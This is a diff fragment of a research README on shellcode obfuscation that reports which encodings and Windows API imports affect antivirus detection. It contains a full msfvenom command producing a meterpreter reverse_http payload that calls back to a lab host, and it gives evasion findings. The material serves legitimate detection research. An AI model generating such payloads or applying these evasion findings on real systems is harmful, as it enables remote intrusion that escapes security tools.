dobin/ShellcodeObfuscationLab/README.md

 ## Results

+Tests have been performed with einer "random" - a alphanumeric 20 byte string.
+And "Metasploit" with output of `msfvenom -p windows/x64/meterpreter/reverse_http LHOST=192.168.190.134 LPORT=80 -f raw -o beacon.bin`.
+The "Metasploit" does not execute the shellcode, only decodes and prints it.

+Conclusion:
+* Encoding/Encryption doesnt matter
+* More important is if a windows API is being used/imported (IAT in PE)
+* Note that NO obfuscation metasploit outperforms AES encryption, base64 windows api, ip-, mac- and uuid-encoding.

 | **What**           | **Library**           | **Includes**              | **Function / IAT**                 | **Random** | **Metasploit** |
 | ------------------ | --------------------- | ------------------------- | ---------------------------------- | ---------- | -------------- |